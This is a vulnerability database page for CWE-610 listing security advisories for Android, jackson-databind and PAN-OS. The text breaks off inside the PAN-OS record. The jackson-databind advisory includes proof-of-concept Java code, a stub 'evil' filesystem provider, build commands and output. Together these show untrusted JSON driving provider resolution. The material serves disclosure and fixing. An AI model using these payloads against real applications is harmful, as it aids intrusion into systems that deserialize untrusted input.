CWE-610
DiscouragedExternally Controlled Reference to a Resource in Another Sphere
Abstraction: Class · Status: Draft
The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere.
294 vulnerabilities reference this CWE, most recent first.
GHSA-WHHH-XG23-HXCW
Vulnerability from github – Published: 2023-10-27 21:30 – Updated: 2023-11-08 03:30In FillUi of FillUi.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2023-40139"
],
"database_specific": {
"cwe_ids": [
"CWE-610"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-27T21:15:09Z",
"severity": "MODERATE"
},
"details": "In FillUi of FillUi.java, there is a possible way to view another user\u0027s images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-whhh-xg23-hxcw",
"modified": "2023-11-08T03:30:31Z",
"published": "2023-10-27T21:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40139"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/08becc8c600f14c5529115cc1a1e0c97cd503f33"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2023-10-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WJGM-6HV5-3CVF
Vulnerability from github – Published: 2026-09-28 20:19 – Updated: 2026-09-28 20:19Summary
A java.nio.file.Path field bound from untrusted JSON reaches JDKFromStringDeserializer.NioPathHelper.deserialize. The attacker string flows through new URI(value) → Path.of(uri), then on FileSystemNotFoundException into a ServiceLoader<FileSystemProvider> enumeration that calls provider.getPath(uri) on the first scheme-matching provider. No scheme is rejected, so untrusted JSON can drive an arbitrary registered provider under the default JsonMapper.builder().build().
Impact is bounded. The JDK built-in providers (file, jar/zipfs) do no network I/O and do not mount, so the path is inert without a side-effecting third-party provider. Binding Path from untrusted input is already an anti-pattern.
Description
NioPathHelper.deserialize performs provider resolution driven by the attacker URI (abridged; the real method also handles a Windows drive-letter prefix and wraps failures via ctxt.handleInstantiationProblem(...)):
int colonIx = value.indexOf(':');
if (colonIx < 0) { return Path.of(value); }
...
final URI uri = new URI(value); // attacker-controlled URI string
try {
return Path.of(uri); // resolves scheme -> may load a FileSystemProvider
} catch (FileSystemNotFoundException cause) {
final String scheme = uri.getScheme();
for (FileSystemProvider provider : ServiceLoader.load(FileSystemProvider.class)) {
if (provider.getScheme().equalsIgnoreCase(scheme)) {
return provider.getPath(uri); // attacker scheme selects & drives a provider
}
}
// no matching provider -> ctxt.handleInstantiationProblem(...) (throws by default)
}
The attacker's scheme selects the provider and the attacker's URI is passed to it; the enumeration also forces provider classloading during readValue. For built-in schemes like jar:, getPath throws FileSystemNotFoundException (a mount requires explicit newFileSystem), surfacing as a wrapped ValueInstantiationException with no terminal effect. Any mount, network I/O, or resource access depends entirely on the selected provider.
Vulnerable Code Location
src/main/java/tools/jackson/databind/deser/jdk/JDKFromStringDeserializer.javaSTD_PATH→NioPathHelper.deserialize;NioPathHelper.deserializebody (new URI→Path.of(uri)→ServiceLoader.load(FileSystemProvider.class)→provider.getPath(uri)).
Proof of Concept
Two PoCs are provided.
PoC 2 registers a custom
FileSystemProviderto show that attacker JSON reachesprovider.getPath(attackerURI)insidereadValue. Whether a third-party provider then does anything harmful is outside the library's control. The in-scope issue is PoC 1 — thejar:/arbitrary-scheme path reaching theServiceLoaderfallback with no scheme restriction.
PoC 1 — sink reached (built-in jar provider).
com/poc/Vuln04_PathProvider.java:
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import java.nio.file.Path;
/**
* Vuln 4: java.nio.file.Path deserialization resolves an attacker URI via
* Path.of(uri) / ServiceLoader<FileSystemProvider>.
*/
public class Vuln04_PathProvider {
public static class Config { public Path workdir; }
public static void main(String[] args) throws Exception {
ObjectMapper mapper = JsonMapper.builder().build();
// jar: scheme forces FileSystemProvider resolution / mounting attempt on attacker URI.
String json = "{\"workdir\":\"jar:file:/tmp/jackson_poc_evil.zip!/x\"}";
System.out.println("Deserializing (default mapper): " + json);
try {
Config c = mapper.readValue(json, Config.class);
System.out.println("Resolved Path = " + c.workdir + " (class=" + (c.workdir==null?"null":c.workdir.getClass().getName()) + ")");
System.out.println("RESULT: VULNERABLE - attacker URI scheme resolved through provider machinery during readValue");
} catch (Throwable t) {
System.out.println("Throwable during resolution: " + t.getClass().getName() + ": " + t.getMessage());
System.out.println("RESULT: VULNERABLE (attacker URI drove provider resolution; threw " + t.getClass().getSimpleName() + " inside readValue)");
}
}
}
PoC 2 — scheme-selection mechanism demo (custom FileSystemProvider).
A third-party provider (scheme evilscheme) registered via META-INF/services/java.nio.file.spi.FileSystemProvider, which is standing in for any provider a real application ships.
com/poc/EvilFileSystemProvider.java:
package com.poc;
import java.nio.file.*;
import java.nio.file.spi.FileSystemProvider;
import java.nio.file.attribute.*;
import java.net.URI;
import java.io.IOException;
import java.util.*;
import java.util.Set;
import java.nio.channels.SeekableByteChannel;
/**
* A custom java.nio.file.spi.FileSystemProvider registered via META-INF/services, using the
* scheme "evilscheme". It stands in for ANY third-party FileSystemProvider present on a real
* application's classpath. Its static initializer and getPath() record that they executed,
* proving that attacker-controlled JSON drove provider class loading + provider.getPath(uri)
* inside jackson's readValue.
*/
public class EvilFileSystemProvider extends FileSystemProvider {
public static volatile boolean STATIC_INIT_RAN = false;
public static volatile String GET_PATH_URI = null;
static { STATIC_INIT_RAN = true; }
@Override public String getScheme() { return "evilscheme"; }
@Override public Path getPath(URI uri) {
GET_PATH_URI = uri.toString();
System.out.println(">>> [EVIL-PROVIDER] getPath() invoked with attacker URI: " + uri);
// A malicious/vulnerable provider could here open a socket, read a file, mount a FS, etc.
return java.nio.file.Path.of(System.getProperty("java.io.tmpdir"), "evilprovider-marker");
}
// --- remaining abstract methods: minimal stubs ---
@Override public FileSystem newFileSystem(URI uri, Map<String,?> env) { throw new UnsupportedOperationException(); }
@Override public FileSystem getFileSystem(URI uri) { throw new FileSystemNotFoundException(); }
@Override public SeekableByteChannel newByteChannel(Path p, Set<? extends OpenOption> o, FileAttribute<?>... a) throws IOException { throw new UnsupportedOperationException(); }
@Override public DirectoryStream<Path> newDirectoryStream(Path d, DirectoryStream.Filter<? super Path> f) { throw new UnsupportedOperationException(); }
@Override public void createDirectory(Path d, FileAttribute<?>... a) { throw new UnsupportedOperationException(); }
@Override public void delete(Path p) { throw new UnsupportedOperationException(); }
@Override public void copy(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
@Override public void move(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
@Override public boolean isSameFile(Path p, Path p2) { return false; }
@Override public boolean isHidden(Path p) { return false; }
@Override public FileStore getFileStore(Path p) { throw new UnsupportedOperationException(); }
@Override public void checkAccess(Path p, AccessMode... m) { }
@Override public <V extends FileAttributeView> V getFileAttributeView(Path p, Class<V> t, LinkOption... o) { return null; }
@Override public <A extends BasicFileAttributes> A readAttributes(Path p, Class<A> t, LinkOption... o) { throw new UnsupportedOperationException(); }
@Override public Map<String,Object> readAttributes(Path p, String a, LinkOption... o) { throw new UnsupportedOperationException(); }
@Override public void setAttribute(Path p, String a, Object v, LinkOption... o) { }
}
Registration descriptor —
src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider:
com.poc.EvilFileSystemProvider
Driver — com/poc/Vuln04b_PathProviderMount.java:
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
/**
* Vuln 4 (end-to-end terminal effect): a third-party FileSystemProvider registered via
* META-INF/services (scheme "evilscheme") stands in for any provider on a real app's
* classpath. Attacker JSON with that scheme drives jackson's ServiceLoader fallback to
* (1) load the provider class (running its static initializer) and (2) invoke
* provider.getPath(attackerUri) -- all inside readValue, with NO application code.
*/
public class Vuln04b_PathProviderMount {
public static class Config { public java.nio.file.Path workdir; }
public static void main(String[] args) throws Exception {
System.out.println("Provider static-init ran before deserialization? " + EvilFileSystemProvider.STATIC_INIT_RAN);
ObjectMapper mapper = JsonMapper.builder().build(); // default config
String json = "{\"workdir\":\"evilscheme://attacker-controlled/target?x=1\"}";
System.out.println("Deserializing (default mapper): " + json);
Config c = mapper.readValue(json, Config.class);
System.out.println("Resolved Path = " + c.workdir);
System.out.println("Provider static-init ran: " + EvilFileSystemProvider.STATIC_INIT_RAN);
System.out.println("Provider.getPath() attacker URI: " + EvilFileSystemProvider.GET_PATH_URI);
boolean ok = EvilFileSystemProvider.GET_PATH_URI != null
&& EvilFileSystemProvider.GET_PATH_URI.contains("attacker-controlled");
System.out.println(ok
? "RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)"
: "RESULT: NOT reproduced");
}
}
Execution Steps
The PoCs need only the three Jackson 3.2.1 jars on the classpath and can be built with plain javac/java . PoC 2 additionally requires the META-INF/services descriptor to be on the runtime classpath
# 0. Locate the three published dependency jars.
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
# 1. Compile the three sources.
cd poc-project
mkdir -p out
javac -cp "$CP" -d out \
src/main/java/com/poc/EvilFileSystemProvider.java \
src/main/java/com/poc/Vuln04_PathProvider.java \
src/main/java/com/poc/Vuln04b_PathProviderMount.java
# 2. Put the ServiceLoader descriptor on the runtime classpath (needed by PoC 2).
mkdir -p out/META-INF/services
cp src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider \
out/META-INF/services/java.nio.file.spi.FileSystemProvider
# 3. Run both PoCs.
java -cp "out:$CP" com.poc.Vuln04_PathProvider # PoC 1
java -cp "out:$CP" com.poc.Vuln04b_PathProviderMount # PoC 2
Reproduction Evidence
Executed against jackson-databind 3.2.1 (OpenJDK 25).
PoC 1 :
Deserializing (default mapper): {"workdir":"jar:file:/tmp/jackson_poc_evil.zip!/x"}
Throwable during resolution: tools.jackson.databind.exc.ValueInstantiationException: Cannot construct instance of `java.nio.file.Path`, problem: `java.nio.file.FileSystemNotFoundException`
at [Source: REDACTED (`StreamReadFeature.INCLUDE_SOURCE_IN_LOCATION` disabled); byte offset: #UNKNOWN] (through reference chain: com.poc.Vuln04_PathProvider$Config["workdir"])
RESULT: VULNERABLE (attacker URI drove provider resolution; threw ValueInstantiationException inside readValue)
Notes: the JDK built-in jar provider's getPath does not auto-mount (it also throws FileSystemNotFoundException, since only newFileSystem mounts). PoC 1 proves the in-scope defect: attacker input reaches the scheme-driven ServiceLoader resolution during readValue with no allow-list. PoC 2 only illustrates the downstream mechanism.
PoC 2 :
Provider static-init ran before deserialization? true
Deserializing (default mapper): {"workdir":"evilscheme://attacker-controlled/target?x=1"}
>>> [EVIL-PROVIDER] getPath() invoked with attacker URI: evilscheme://attacker-controlled/target?x=1
Resolved Path = /var/folders/.../T/evilprovider-marker
Provider static-init ran: true
Provider.getPath() attacker URI: evilscheme://attacker-controlled/target?x=1
RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)
Purely from a JSON string, jackson's ServiceLoader fallback selected the attacker-named scheme's provider and invoked provider.getPath(uri) with the full attacker URI inside readValue. Whether a given provider then does anything harmful is outside the library's control; the in-scope issue is the absence of a scheme restriction before this fallback runs.
Impact
Untrusted JSON drives provider.getPath(attackerURI) on an attacker-chosen provider during readValue. With only the JDK built-in providers this is inert. Real impact requires a side-effecting third-party provider on the classpath. The fix is to close the
scheme-restriction gap.
Recommended Fix
- Restrict the resolved scheme to a fixed, hard-coded set ; reject
jar:and other schemes viactxt.handleWeirdStringValue(...). A hard-coded set keeps the fix backport-safe with no new configuration surface. - Skip the
ServiceLoader<FileSystemProvider>enumeration for disallowed schemes, so untrusted JSON cannot select and drive an arbitrary registered provider. - Document that
java.nio.file.Path-typed fields should not be bound from untrusted JSON.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "tools.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.1.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "tools.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0"
},
{
"fixed": "3.2.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.18.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "2.19.0"
},
{
"fixed": "2.21.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "2.22.0"
},
{
"fixed": "2.22.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-19032"
],
"database_specific": {
"cwe_ids": [
"CWE-470",
"CWE-610"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-28T20:19:19Z",
"nvd_published_at": "2026-09-01T04:18:00Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA `java.nio.file.Path` field bound from untrusted JSON reaches `JDKFromStringDeserializer.NioPathHelper.deserialize`. The attacker string flows through `new URI(value)` \u2192 `Path.of(uri)`, then on `FileSystemNotFoundException` into a `ServiceLoader\u003cFileSystemProvider\u003e` enumeration that calls `provider.getPath(uri)` on the first scheme-matching provider. No scheme is rejected, so untrusted JSON can drive an arbitrary registered provider under the default `JsonMapper.builder().build()`.\n\nImpact is bounded. The JDK built-in providers (`file`, `jar`/zipfs) do no network I/O and do not mount, so the path is inert without a side-effecting third-party provider. Binding `Path` from untrusted input is already an anti-pattern.\n\n### Description\n\n`NioPathHelper.deserialize` performs provider resolution driven by the attacker URI (abridged; the real method also handles a Windows drive-letter prefix and wraps failures via `ctxt.handleInstantiationProblem(...)`):\n\n```java\nint colonIx = value.indexOf(\u0027:\u0027);\nif (colonIx \u003c 0) { return Path.of(value); }\n...\nfinal URI uri = new URI(value); // attacker-controlled URI string\ntry {\n return Path.of(uri); // resolves scheme -\u003e may load a FileSystemProvider\n} catch (FileSystemNotFoundException cause) {\n final String scheme = uri.getScheme();\n for (FileSystemProvider provider : ServiceLoader.load(FileSystemProvider.class)) {\n if (provider.getScheme().equalsIgnoreCase(scheme)) {\n return provider.getPath(uri); // attacker scheme selects \u0026 drives a provider\n }\n }\n // no matching provider -\u003e ctxt.handleInstantiationProblem(...) (throws by default)\n}\n```\n\nThe attacker\u0027s scheme selects the provider and the attacker\u0027s URI is passed to it; the enumeration also forces provider classloading during `readValue`. For built-in schemes like `jar:`, `getPath` throws `FileSystemNotFoundException` (a mount requires explicit `newFileSystem`), surfacing as a wrapped `ValueInstantiationException` with no terminal effect. Any mount, network I/O, or resource access depends entirely on the selected provider.\n\n## Vulnerable Code Location\n\n- `src/main/java/tools/jackson/databind/deser/jdk/JDKFromStringDeserializer.java`\n - `STD_PATH` \u2192 `NioPathHelper.deserialize`; `NioPathHelper.deserialize` body \n (`new URI` \u2192 `Path.of(uri)` \u2192 `ServiceLoader.load(FileSystemProvider.class)` \u2192 `provider.getPath(uri)`).\n\n\n## Proof of Concept\n\nTwo PoCs are provided. \n\n\u003e PoC 2 registers a custom `FileSystemProvider` to show that attacker JSON reaches `provider.getPath(attackerURI)` inside `readValue`. Whether a third-party provider then does anything harmful is outside the library\u0027s control. The in-scope issue is **PoC 1** \u2014 the `jar:`/arbitrary-scheme path reaching the `ServiceLoader` fallback with no scheme restriction.\n\n**PoC 1 \u2014 sink reached (built-in `jar` provider).** \n\n`com/poc/Vuln04_PathProvider.java`:\n```java\npackage com.poc;\n\nimport tools.jackson.databind.ObjectMapper;\nimport tools.jackson.databind.json.JsonMapper;\nimport java.nio.file.Path;\n\n/**\n * Vuln 4: java.nio.file.Path deserialization resolves an attacker URI via\n * Path.of(uri) / ServiceLoader\u003cFileSystemProvider\u003e.\n */\npublic class Vuln04_PathProvider {\n public static class Config { public Path workdir; }\n\n public static void main(String[] args) throws Exception {\n ObjectMapper mapper = JsonMapper.builder().build();\n // jar: scheme forces FileSystemProvider resolution / mounting attempt on attacker URI.\n String json = \"{\\\"workdir\\\":\\\"jar:file:/tmp/jackson_poc_evil.zip!/x\\\"}\";\n System.out.println(\"Deserializing (default mapper): \" + json);\n try {\n Config c = mapper.readValue(json, Config.class);\n System.out.println(\"Resolved Path = \" + c.workdir + \" (class=\" + (c.workdir==null?\"null\":c.workdir.getClass().getName()) + \")\");\n System.out.println(\"RESULT: VULNERABLE - attacker URI scheme resolved through provider machinery during readValue\");\n } catch (Throwable t) {\n System.out.println(\"Throwable during resolution: \" + t.getClass().getName() + \": \" + t.getMessage());\n System.out.println(\"RESULT: VULNERABLE (attacker URI drove provider resolution; threw \" + t.getClass().getSimpleName() + \" inside readValue)\");\n }\n }\n}\n```\n\n**PoC 2 \u2014 scheme-selection mechanism demo (custom `FileSystemProvider`).**\nA third-party provider (scheme `evilscheme`) registered via `META-INF/services/java.nio.file.spi.FileSystemProvider`, which is standing in for *any* provider a real application ships. \n\n`com/poc/EvilFileSystemProvider.java`:\n```java\npackage com.poc;\n\nimport java.nio.file.*;\nimport java.nio.file.spi.FileSystemProvider;\nimport java.nio.file.attribute.*;\nimport java.net.URI;\nimport java.io.IOException;\nimport java.util.*;\nimport java.util.Set;\nimport java.nio.channels.SeekableByteChannel;\n\n/**\n * A custom java.nio.file.spi.FileSystemProvider registered via META-INF/services, using the\n * scheme \"evilscheme\". It stands in for ANY third-party FileSystemProvider present on a real\n * application\u0027s classpath. Its static initializer and getPath() record that they executed,\n * proving that attacker-controlled JSON drove provider class loading + provider.getPath(uri)\n * inside jackson\u0027s readValue.\n */\npublic class EvilFileSystemProvider extends FileSystemProvider {\n public static volatile boolean STATIC_INIT_RAN = false;\n public static volatile String GET_PATH_URI = null;\n static { STATIC_INIT_RAN = true; }\n\n @Override public String getScheme() { return \"evilscheme\"; }\n\n @Override public Path getPath(URI uri) {\n GET_PATH_URI = uri.toString();\n System.out.println(\"\u003e\u003e\u003e [EVIL-PROVIDER] getPath() invoked with attacker URI: \" + uri);\n // A malicious/vulnerable provider could here open a socket, read a file, mount a FS, etc.\n return java.nio.file.Path.of(System.getProperty(\"java.io.tmpdir\"), \"evilprovider-marker\");\n }\n\n // --- remaining abstract methods: minimal stubs ---\n @Override public FileSystem newFileSystem(URI uri, Map\u003cString,?\u003e env) { throw new UnsupportedOperationException(); }\n @Override public FileSystem getFileSystem(URI uri) { throw new FileSystemNotFoundException(); }\n @Override public SeekableByteChannel newByteChannel(Path p, Set\u003c? extends OpenOption\u003e o, FileAttribute\u003c?\u003e... a) throws IOException { throw new UnsupportedOperationException(); }\n @Override public DirectoryStream\u003cPath\u003e newDirectoryStream(Path d, DirectoryStream.Filter\u003c? super Path\u003e f) { throw new UnsupportedOperationException(); }\n @Override public void createDirectory(Path d, FileAttribute\u003c?\u003e... a) { throw new UnsupportedOperationException(); }\n @Override public void delete(Path p) { throw new UnsupportedOperationException(); }\n @Override public void copy(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }\n @Override public void move(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }\n @Override public boolean isSameFile(Path p, Path p2) { return false; }\n @Override public boolean isHidden(Path p) { return false; }\n @Override public FileStore getFileStore(Path p) { throw new UnsupportedOperationException(); }\n @Override public void checkAccess(Path p, AccessMode... m) { }\n @Override public \u003cV extends FileAttributeView\u003e V getFileAttributeView(Path p, Class\u003cV\u003e t, LinkOption... o) { return null; }\n @Override public \u003cA extends BasicFileAttributes\u003e A readAttributes(Path p, Class\u003cA\u003e t, LinkOption... o) { throw new UnsupportedOperationException(); }\n @Override public Map\u003cString,Object\u003e readAttributes(Path p, String a, LinkOption... o) { throw new UnsupportedOperationException(); }\n @Override public void setAttribute(Path p, String a, Object v, LinkOption... o) { }\n}\n```\n\nRegistration descriptor \u2014\n`src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider`:\n```\ncom.poc.EvilFileSystemProvider\n```\n\nDriver \u2014 `com/poc/Vuln04b_PathProviderMount.java`:\n```java\npackage com.poc;\n\nimport tools.jackson.databind.ObjectMapper;\nimport tools.jackson.databind.json.JsonMapper;\n\n/**\n * Vuln 4 (end-to-end terminal effect): a third-party FileSystemProvider registered via\n * META-INF/services (scheme \"evilscheme\") stands in for any provider on a real app\u0027s\n * classpath. Attacker JSON with that scheme drives jackson\u0027s ServiceLoader fallback to\n * (1) load the provider class (running its static initializer) and (2) invoke\n * provider.getPath(attackerUri) -- all inside readValue, with NO application code.\n */\npublic class Vuln04b_PathProviderMount {\n public static class Config { public java.nio.file.Path workdir; }\n\n public static void main(String[] args) throws Exception {\n System.out.println(\"Provider static-init ran before deserialization? \" + EvilFileSystemProvider.STATIC_INIT_RAN);\n ObjectMapper mapper = JsonMapper.builder().build(); // default config\n String json = \"{\\\"workdir\\\":\\\"evilscheme://attacker-controlled/target?x=1\\\"}\";\n System.out.println(\"Deserializing (default mapper): \" + json);\n\n Config c = mapper.readValue(json, Config.class);\n\n System.out.println(\"Resolved Path = \" + c.workdir);\n System.out.println(\"Provider static-init ran: \" + EvilFileSystemProvider.STATIC_INIT_RAN);\n System.out.println(\"Provider.getPath() attacker URI: \" + EvilFileSystemProvider.GET_PATH_URI);\n boolean ok = EvilFileSystemProvider.GET_PATH_URI != null\n \u0026\u0026 EvilFileSystemProvider.GET_PATH_URI.contains(\"attacker-controlled\");\n System.out.println(ok\n ? \"RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)\"\n : \"RESULT: NOT reproduced\");\n }\n}\n```\n\n## Execution Steps\n\nThe PoCs need only the three Jackson 3.2.1 jars on the classpath and can be built with plain `javac`/`java` . PoC 2 additionally requires the `META-INF/services` descriptor to be on the **runtime** classpath\n\n```bash\n# 0. Locate the three published dependency jars.\nM2=\"$HOME/.m2/repository\"\nDB=\"$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar\"\nCORE=\"$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar\"\nANN=\"$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar\"\nCP=\"$DB:$CORE:$ANN\"\n\n# 1. Compile the three sources.\ncd poc-project\nmkdir -p out\njavac -cp \"$CP\" -d out \\\n src/main/java/com/poc/EvilFileSystemProvider.java \\\n src/main/java/com/poc/Vuln04_PathProvider.java \\\n src/main/java/com/poc/Vuln04b_PathProviderMount.java\n\n# 2. Put the ServiceLoader descriptor on the runtime classpath (needed by PoC 2).\nmkdir -p out/META-INF/services\ncp src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider \\\n out/META-INF/services/java.nio.file.spi.FileSystemProvider\n\n# 3. Run both PoCs.\njava -cp \"out:$CP\" com.poc.Vuln04_PathProvider # PoC 1\njava -cp \"out:$CP\" com.poc.Vuln04b_PathProviderMount # PoC 2\n```\n\n## Reproduction Evidence\n\nExecuted against jackson-databind 3.2.1 (OpenJDK 25).\n\n**PoC 1 :**\n```\nDeserializing (default mapper): {\"workdir\":\"jar:file:/tmp/jackson_poc_evil.zip!/x\"}\nThrowable during resolution: tools.jackson.databind.exc.ValueInstantiationException: Cannot construct instance of `java.nio.file.Path`, problem: `java.nio.file.FileSystemNotFoundException`\n at [Source: REDACTED (`StreamReadFeature.INCLUDE_SOURCE_IN_LOCATION` disabled); byte offset: #UNKNOWN] (through reference chain: com.poc.Vuln04_PathProvider$Config[\"workdir\"])\nRESULT: VULNERABLE (attacker URI drove provider resolution; threw ValueInstantiationException inside readValue)\n```\nNotes: the JDK **built-in** `jar` provider\u0027s `getPath` does not auto-mount (it also throws `FileSystemNotFoundException`, since only `newFileSystem` mounts). PoC 1 proves the in-scope defect: attacker input reaches the scheme-driven `ServiceLoader` resolution during `readValue` with no allow-list. PoC 2 only illustrates the downstream mechanism.\n\n**PoC 2 :**\n```\nProvider static-init ran before deserialization? true\nDeserializing (default mapper): {\"workdir\":\"evilscheme://attacker-controlled/target?x=1\"}\n\u003e\u003e\u003e [EVIL-PROVIDER] getPath() invoked with attacker URI: evilscheme://attacker-controlled/target?x=1\nResolved Path = /var/folders/.../T/evilprovider-marker\nProvider static-init ran: true\nProvider.getPath() attacker URI: evilscheme://attacker-controlled/target?x=1\nRESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)\n```\nPurely from a JSON string, jackson\u0027s `ServiceLoader` fallback selected the attacker-named scheme\u0027s provider and invoked `provider.getPath(uri)` with the full attacker URI inside `readValue`. Whether a given provider then does anything harmful is outside the library\u0027s control; the in-scope issue is the absence of a scheme restriction before this fallback runs.\n\n## Impact\n\nUntrusted JSON drives `provider.getPath(attackerURI)` on an attacker-chosen provider during `readValue`. With only the JDK built-in providers this is inert. Real impact requires a side-effecting third-party provider on the classpath. The fix is to close the\nscheme-restriction gap.\n\n## Recommended Fix\n\n1. **Restrict the resolved scheme to a fixed, hard-coded set** ; reject `jar:` and other schemes via `ctxt.handleWeirdStringValue(...)`. A hard-coded set keeps the fix backport-safe with no new configuration surface.\n2. **Skip the `ServiceLoader\u003cFileSystemProvider\u003e` enumeration for disallowed schemes**, so untrusted JSON cannot select and drive an arbitrary registered provider.\n3. Document that `java.nio.file.Path`-typed fields should not be bound from untrusted JSON.",
"id": "GHSA-wjgm-6hv5-3cvf",
"modified": "2026-09-28T20:19:19Z",
"published": "2026-09-28T20:19:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-wjgm-6hv5-3cvf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-19032"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/pull/6129"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/cc6756b61ed90b6b9227f670e0408d5d9bd48551"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/ce26eda3481cd796f76ba4c53ffe1da23b53f166"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/d94bb632becfe0ba96926b9909ab06d1f87aad6d"
},
{
"type": "PACKAGE",
"url": "https://github.com/FasterXML/jackson-databind"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.18.10"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.21.6"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.22.2"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.1.6"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.2.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "jackson-databind: Path Deserialization Missing Scheme Allowlist for FileSystemProvider Resolution"
}
GHSA-WMCV-PJ3G-38RP
Vulnerability from github – Published: 2025-02-12 21:31 – Updated: 2025-10-22 00:33An authenticated file read vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker with network access to the management web interface to read files on the PAN-OS filesystem that are readable by the “nobody” user.
You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .
This issue does not affect Cloud NGFW or Prisma Access software.
{
"affected": [],
"aliases": [
"CVE-2025-0111"
],
"database_specific": {
"cwe_ids": [
"CWE-610",
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-12T21:15:16Z",
"severity": "HIGH"
},
"details": "An authenticated file read vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker with network access to the management web interface to read files on the PAN-OS filesystem that are readable by the \u201cnobody\u201d user.\n\nYou can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 .\n\n\n\nThis issue does not affect Cloud NGFW or Prisma Access software.",
"id": "GHSA-wmcv-pj3g-38rp",
"modified": "2025-10-22T00:33:12Z",
"published": "2025-02-12T21:31:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0111"
},
{
"type": "WEB",
"url": "https://security.paloaltonetworks.com/CVE-2025-0111"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-0111"
}
],
"schema_version": "1.4.0",
